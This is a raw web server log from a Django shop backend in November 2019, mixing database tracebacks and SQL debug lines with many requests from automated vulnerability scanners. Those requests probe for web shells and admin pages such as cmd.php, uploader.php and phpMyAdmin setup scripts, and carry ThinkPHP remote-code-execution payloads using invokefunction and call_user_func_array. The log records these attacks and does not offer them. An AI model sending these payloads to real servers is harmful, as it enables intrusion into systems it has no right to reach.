"/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 22:00:57] "GET /webdav/ HTTP/1.0" 500 131201 Not Found: /help.php [29/Nov/2019 22:00:59] "GET /help.php HTTP/1.0" 404 6399 Not Found: /dtgh/mailto:2016Äê1-9Ôµ³Ô±½»Äɵ³·ÑÇé¿öͳ¼Æ±í¡·Éϱ¨¾Ö»ú¹Øµ³Î¯ÓÊÏäcnjyjjgdw@163.com [29/Nov/2019 22:00:59] "GET /dtgh/mailto:2016%C3%84%C3%AA1-9%C3%94%C3%82%C2%B5%C2%B3%C3%94%C2%B1%C2%BD%C2%BB%C3%84%C3%89%C2%B5%C2%B3%C2%B7%C3%91%C3%87%C3%A9%C2%BF%C3%B6%C3%8D%C2%B3%C2%BC%C3%86%C2%B1%C3%AD%C2%A1%C2%B7%C3%89%C3%8F%C2%B1%C2%A8%C2%BE%C3%96%C2%BB%C3%BA%C2%B9%C3%98%C2%B5%C2%B3%C3%8E%C2%AF%C3%93%C3%8A%C3%8F%C3%A4cnjyjjgdw@163.com HTTP/1.0" 404 6944 Not Found: /java.php [29/Nov/2019 22:01:00] "GET /java.php HTTP/1.0" 404 6399 Not Found: /_query.php [29/Nov/2019 22:01:01] "GET /_query.php HTTP/1.0" 404 6405 Not Found: /test.php [29/Nov/2019 22:01:02] "GET /test.php HTTP/1.0" 404 6399 Not Found: /db_cts.php [29/Nov/2019 22:01:03] "GET /db_cts.php HTTP/1.0" 404 6405 Not Found: /db_pma.php [29/Nov/2019 22:01:03] "GET /db_pma.php HTTP/1.0" 404 6405 Not Found: /logon.php [29/Nov/2019 22:01:04] "GET /logon.php HTTP/1.0" 404 6402 Not Found: /help-e.php [29/Nov/2019 22:01:04] "GET /help-e.php HTTP/1.0" 404 6405 Not Found: /license.php [29/Nov/2019 22:01:05] "GET /license.php HTTP/1.0" 404 6408 Not Found: /log.php [29/Nov/2019 22:01:05] "GET /log.php HTTP/1.0" 404 6396 Not Found: /hell.php [29/Nov/2019 22:01:07] "GET /hell.php HTTP/1.0" 404 6399 Not Found: /pmd_online.php [29/Nov/2019 22:01:07] "GET /pmd_online.php HTTP/1.0" 404 6417 Not Found: /x.php [29/Nov/2019 22:01:08] "GET /x.php HTTP/1.0" 404 6390 Not Found: /dtgh/mailto:2016年1-9月党员交纳党费情况统计表》上报局机关党委邮箱cnjyjjgdw@163.com [29/Nov/2019 22:01:12] "GET /dtgh/mailto:2016%E5%B9%B41-9%E6%9C%88%E5%85%9A%E5%91%98%E4%BA%A4%E7%BA%B3%E5%85%9A%E8%B4%B9%E6%83%85%E5%86%B5%E7%BB%9F%E8%AE%A1%E8%A1%A8%E3%80%8B%E4%B8%8A%E6%8A%A5%E5%B1%80%E6%9C%BA%E5%85%B3%E5%85%9A%E5%A7%94%E9%82%AE%E7%AE%B1cnjyjjgdw@163.com HTTP/1.0" 404 6829 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:01:20] "GET /dyzl/ShowClass.asp?ClassID=23&page=%C3%92%C2%B9%C3%89%C2%AB%C2%B3%C2%A4%C3%8D%C2%A4%C2%B5%C3%86%C2%B9%C3%A2%C3%83%C3%B7 HTTP/1.0" 404 6535 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:01:31] "GET /dyzl/ShowClass.asp?ClassID=23&page=%E5%A4%9C%E8%89%B2%E9%95%BF%E4%BA%AD%E7%81%AF%E5%85%89%E6%98%8E HTTP/1.0" 404 6514 Not Found: /b.php [29/Nov/2019 22:01:33] "GET /b.php HTTP/1.0" 404 6390 Not Found: /sane.php [29/Nov/2019 22:01:35] "GET /sane.php HTTP/1.0" 404 6399 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:01:44] "GET /dyzl/ShowClass.asp?ClassID=2%C2%B8%C3%B8%C2%B3%C3%B6%C3%81%C3%8B%C3%8B%C3%BB%C3%97%C3%94%C2%B8%C3%B6%C2%B5%C3%84%C2%B7%C2%BD%C2%B0%C2%B8&page=%C2%B8%C3%B8%C2%B3%C3%B6%C3%81%C3%8B%C3%8B%C3%BB%C3%97%C3%94%C2%B8%C3%B6%C2%B5%C3%84%C2%B7%C2%BD%C2%B0%C2%B8 HTTP/1.0" 404 6666 [29/Nov/2019 22:01:50] "GET / HTTP/1.0" 302 0 Not Found: /desktop.ini.php [29/Nov/2019 22:01:50] "GET /desktop.ini.php HTTP/1.0" 404 6420 Not Found: /z.php [29/Nov/2019 22:01:54] "GET /z.php HTTP/1.0" 404 6390 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:01:57] "GET /dyzl/ShowClass.asp?ClassID=2%E7%BB%99%E5%87%BA%E4%BA%86%E4%BB%96%E8%87%AA%E4%B8%AA%E7%9A%84%E6%96%B9%E6%A1%88&page=%E7%BB%99%E5%87%BA%E4%BA%86%E4%BB%96%E8%87%AA%E4%B8%AA%E7%9A%84%E6%96%B9%E6%A1%88 HTTP/1.0" 404 6612 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:02:13] "GET /dyzl/ShowClass.asp?ClassID=%C3%94%C3%9A%C3%89%C3%BA%C3%8C%C2%AC%C3%8F%C2%B5%C3%8D%C2%B3%C3%96%C3%903&page=%C3%94%C3%9A%C3%89%C3%BA%C3%8C%C2%AC%C3%8F%C2%B5%C3%8D%C2%B3%C3%96%C3%90 HTTP/1.0" 404 6594 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:02:24] "GET /dyzl/ShowClass.asp?ClassID=%E5%85%B6%E9%97%B4%EF%BC%9A%E8%A5%BF%E9%83%A8%E5%9C%B0%E5%8C%BA%E4%B8%BA8:21&page=%E5%85%B6%E9%97%B4%EF%BC%9A%E8%A5%BF%E9%83%A8%E5%9C%B0%E5%8C%BA%E4%B8%BA8:2 HTTP/1.0" 404 6600 Not Found: /dyzl/ShowClass.asp [29/Nov/2019 22:02:36] "GET /dyzl/ShowClass.asp?ClassID=%E5%9C%A8%E7%94%9F%E6%80%81%E7%B3%BB%E7%BB%9F%E4%B8%AD3&page=%E5%9C%A8%E7%94%9F%E6%80%81%E7%B3%BB%E7%BB%9F%E4%B8%AD HTTP/1.0" 404 6558 Not Found: /index.asp [29/Nov/2019 22:02:49] "GET /index.asp?T=copyRight&%C2%B2%C2%BB%C3%8A%C3%87%C3%8D%C2%B7%C3%8F%C3%88%C3%97%C3%85%C2%B5%C3%98 HTTP/1.0" 404 6492 Not Found: /index.asp [29/Nov/2019 22:03:00] "GET /index.asp?T=copyRight&%E4%B8%8D%E6%98%AF%E5%A4%B4%E5%85%88%E7%9D%80%E5%9C%B0 HTTP/1.0" 404 6474 Not Found: /lala.php [29/Nov/2019 22:03:05] "GET /lala.php HTTP/1.0" 404 6399 Not Found: /wpc.php [29/Nov/2019 22:03:10] "GET /wpc.php HTTP/1.0" 404 6396 Not Found: /index.asp [29/Nov/2019 22:03:11] "GET /index.asp?pageno=%E5%8D%B3%E5%8F%AF%E5%9C%A810%E7%A7%92%E5%86%85%E5%BC%83%E7%94%A8%E8%AF%A5%E8%BD%BD%E5%85%B7 HTTP/1.0" 404 6503 Not Found: /wpo.php [29/Nov/2019 22:03:14] "GET /wpo.php HTTP/1.0" 404 6396 Not Found: /t6nv.php [29/Nov/2019 22:03:17] "GET /t6nv.php HTTP/1.0" 404 6399 Not Found: /muhstik.php [29/Nov/2019 22:03:17] "GET /muhstik.php HTTP/1.0" 404 6408 Not Found: /text.php [29/Nov/2019 22:03:18] "GET /text.php HTTP/1.0" 404 6399 Not Found: /jyky/ShowClass.asp [29/Nov/2019 22:03:23] "GET /jyky/ShowClass.asp?ClassID=17&page=%C2%B4%C3%932001%C3%84%C3%AA%C2%BF%C2%AA%C2%B6%C3%8B%C3%97%C3%B6%C3%88%C3%AD%C2%BC%C3%BE%C2%BF%C2%AA%C2%B7%C2%A2 HTTP/1.0" 404 6563 Not Found: /jyky/ShowClass.asp [29/Nov/2019 22:03:29] "GET /jyky/ShowClass.asp?ClassID=17&page=%E4%BB%8E2001%E5%B9%B4%E5%BC%80%E7%AB%AF%E5%81%9A%E8%BD%AF%E4%BB%B6%E5%BC%80%E5%8F%91 HTTP/1.0" 404 6536 Not Found: /muhstik2.php [29/Nov/2019 22:03:31] "GET /muhstik2.php HTTP/1.0" 404 6411 Not Found: /muhstiks.php [29/Nov/2019 22:03:34] "GET /muhstiks.php HTTP/1.0" 404 6411 Not Found: /muhstik-dpr.php [29/Nov/2019 22:03:41] "GET /muhstik-dpr.php HTTP/1.0" 404 6420 Not Found: /jyky/ShowClass.asp [29/Nov/2019 22:03:41] "GET /jyky/ShowClass.asp?ClassID=%C3%84%C2%B8%C3%93%C3%AF%C3%8A%C3%87%C3%94%C3%90%C3%93%C3%BD%C3%8E%C3%84%C3%91%C2%A7%C2%B5%C3%84%C3%8C%C2%A5%C2%B4%C2%B27&page=%C3%84%C2%B8%C3%93%C3%AF%C3%8A%C3%87%C3%94%C3%90%C3%93%C3%BD%C3%8E%C3%84%C3%91%C2%A7%C2%B5%C3%84%C3%8C%C2%A5%C2%B4%C2%B2 HTTP/1.0" 404 6690 Not Found: /lol.php [29/Nov/2019 22:03:43] "GET /lol.php HTTP/1.0" 404 6396 Not Found: /uploader.php [29/Nov/2019 22:03:45] "GET /uploader.php HTTP/1.0" 404 6411 Not Found: /cmd.php [29/Nov/2019 22:03:45] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /mailto:各直属学校教科室主任统计后在7月13日前将住宿名单发qdjyzw@126.com [29/Nov/2019 22:03:53] "GET /mailto:%E5%90%84%E7%9B%B4%E5%B1%9E%E5%AD%A6%E6%A0%A1%E6%95%99%E7%A7%91%E5%AE%A4%E4%B8%BB%E4%BB%BB%E7%BB%9F%E8%AE%A1%E5%90%8E%E5%9C%A87%E6%9C%8813%E6%97%A5%E5%89%8D%E5%B0%86%E4%BD%8F%E5%AE%BF%E5%90%8D%E5%8D%95%E5%8F%91qdjyzw@126.com HTTP/1.0" 404 6793 Not Found: /knal.php [29/Nov/2019 22:03:54] "GET /knal.php HTTP/1.0" 404 6399 Not Found: /cmd.php [29/Nov/2019 22:04:02] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /mailto:汇龙镇长龙三村10@405 [29/Nov/2019 22:04:05] "GET /mailto:%E6%B1%87%E9%BE%99%E9%95%87%E9%95%BF%E9%BE%99%E4%B8%89%E6%9D%9110@405 HTTP/1.0" 404 6520 Not Found: /scripts/setup.php [29/Nov/2019 22:04:15] "GET /scripts/setup.php HTTP/1.0" 404 6426 Not Found: /newslist.asp [29/Nov/2019 22:04:16] "GET /newslist.asp?id=30000 HTTP/1.0" 404 6421 Not Found: /phpmyadmin/scripts/setup.php [29/Nov/2019 22:04:22] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /newslist.asp [29/Nov/2019 22:04:29] "GET /newslist.asp?id=40000 HTTP/1.0" 404 6421 Not Found: /scripts/db___.init.php [29/Nov/2019 22:04:35] "GET /scripts/db___.init.php HTTP/1.0" 404 6441 Not Found: /newslist.asp [29/Nov/2019 22:04:38] "GET /newslist.asp?id=50000 HTTP/1.0" 404 6421 Not Found: /phpMyAdmin/scripts/db___.init.php [29/Nov/2019 22:04:38] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6474 Not Found: /pma/scripts/setup.php [29/Nov/2019 22:04:39] "GET /pma/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /PMA/scripts/setup.php [29/Nov/2019 22:04:40] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /myadmin/scripts/setup.php [29/Nov/2019 22:04:40] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /MyAdmin/scripts/setup.php [29/Nov/2019 22:04:41] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /pma/scripts/db___.init.php [29/Nov/2019 22:04:41] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6453 Not Found: /PMA/scripts/db___.init.php [29/Nov/2019 22:04:42] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6453 Not Found: /newslist.asp [29/Nov/2019 22:04:42] "GET /newslist.asp?id=60000 HTTP/1.0" 404 6421 Not Found: /newslist.asp [29/Nov/2019 22:04:46] "GET /newslist.asp?id=70000 HTTP/1.0" 404 6421 Not Found: /MyAdmin/scripts/db___.init.php [29/Nov/2019 22:04:54] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6465 Not Found: /newslist.asp [29/Nov/2019 22:04:57] "GET /newslist.asp?id=80000 HTTP/1.0" 404 6421 Not Found: /cacti/plugins/weathermap/editor.php [29/Nov/2019 22:04:58] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6480 Not Found: /weathermap/editor.php [29/Nov/2019 22:04:59] "GET /weathermap/editor.php HTTP/1.0" 404 6438 Not Found: /xsyd/ShowClass.asp [29/Nov/2019 22:05:05] "GET /xsyd/ShowClass.asp?ClassID=%E7%8E%AF%E9%A1%BE%E4%BA%8C%E5%8D%81%E4%B8%96%E7%BA%AA%E7%9A%84%E6%96%B0%E5%84%92%E5%AE%B69&page=%E7%8E%AF%E9%A1%BE%E4%BA%8C%E5%8D%81%E4%B8%96%E7%BA%AA%E7%9A%84%E6%96%B0%E5%84%92%E5%AE%B6 HTTP/1.0" 404 6630 Not Found: /index.php [29/Nov/2019 22:05:08] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6649 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:05:13] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C2%A1%C2%B6 HTTP/1.0" 404 6462 DEBUG 2019-11-29 22:05:14,952 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) DEBUG 2019-11-29 22:05:14,989 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 22:05:14,990 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:14,991 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:14,992 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 22:05:14,993 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:14,994 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 22:05:14,995 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 22:05:14,996 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) Internal Server Error: /App/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 22:05:15] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 500 131893 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:05:23] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C2%B0%C3%99%C2%BC%C3%92%C3%95%C3%B9%C3%83%C3%B9%C2%B5%C3%84%C2%B7%C2%BD%C3%95%C3%AB HTTP/1.0" 404 6534 Not Found: /index.php [29/Nov/2019 22:05:27] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6458 [29/Nov/2019 22:05:30] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 Not Found: /TP/public/index.php [29/Nov/2019 22:05:31] "GET /TP/public/index.php HTTP/1.0" 404 6432 Not Found: /TP/index.php [29/Nov/2019 22:05:32] "GET /TP/index.php HTTP/1.0" 404 6411 Not Found: /thinkphp/html/public/index.php [29/Nov/2019 22:05:32] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6465 Not Found: /html/public/index.php [29/Nov/2019 22:05:33] "GET /html/public/index.php HTTP/1.0" 404 6438 Not Found: /public/index.php [29/Nov/2019 22:05:33] "GET /public/index.php HTTP/1.0" 404 6423 Not Found: /TP/html/public/index.php [29/Nov/2019 22:05:34] "GET /TP/html/public/index.php HTTP/1.0" 404 6447 Not Found: /elrekt.php [29/Nov/2019 22:05:34] "GET /elrekt.php HTTP/1.0" 404 6405 Not Found: /xyzx/ShowClass.asp [29/Nov/2019 22:05:35] "GET /xyzx/ShowClass.asp?ClassID=1&page=%C2%B4%C3%B8%C3%94%C3%9B%C3%83%C3%87%C3%97%C3%9F%C2%BD%C3%B8%C3%8D%C3%B8%C2%BA%C3%AC%C2%B5%C3%84%C2%B9%C3%BA%C2%BC%C3%8A HTTP/1.0" 404 6570 Not Found: /index.php [29/Nov/2019 22:05:35] "GET /index.php HTTP/1.0" 404 6402 [29/Nov/2019 22:05:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 22:05:36,293 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'andey1q6kx3pj5yhevb7z7u2pdiiblj7' LIMIT 1; args=('andey1q6kx3pj5yhevb7z7u2pdiiblj7',) DEBUG 2019-11-29 22:05:36,296 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('andey1q6kx3pj5yhevb7z7u2pdiiblj7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T22:05:36.294297+00:00'::timestamptz); args=('andey1q6kx3pj5yhevb7z7u2pdiiblj7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 22, 5, 36, 294297, tzinfo=)) [29/Nov/2019 22:05:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 22:05:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 22:05:45,174 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) DEBUG 2019-11-29 22:05:45,198 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 22:05:45,199 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:45,200 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:45,201 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:05:45,202 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:45,203 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:05:45,204 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 22:05:45,205 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) Internal Server Error: /joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 22:05:45] "GET /joomla/ HTTP/1.0" 500 131440 DEBUG 2019-11-29 22:05:46,974 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) DEBUG 2019-11-29 22:05:47,016 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 22:05:47,017 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:47,019 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:05:47,020 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla' LIMIT 21; args=('Joomla',) DEBUG 2019-11-29 22:05:47,022 utils 26999 140702522537728 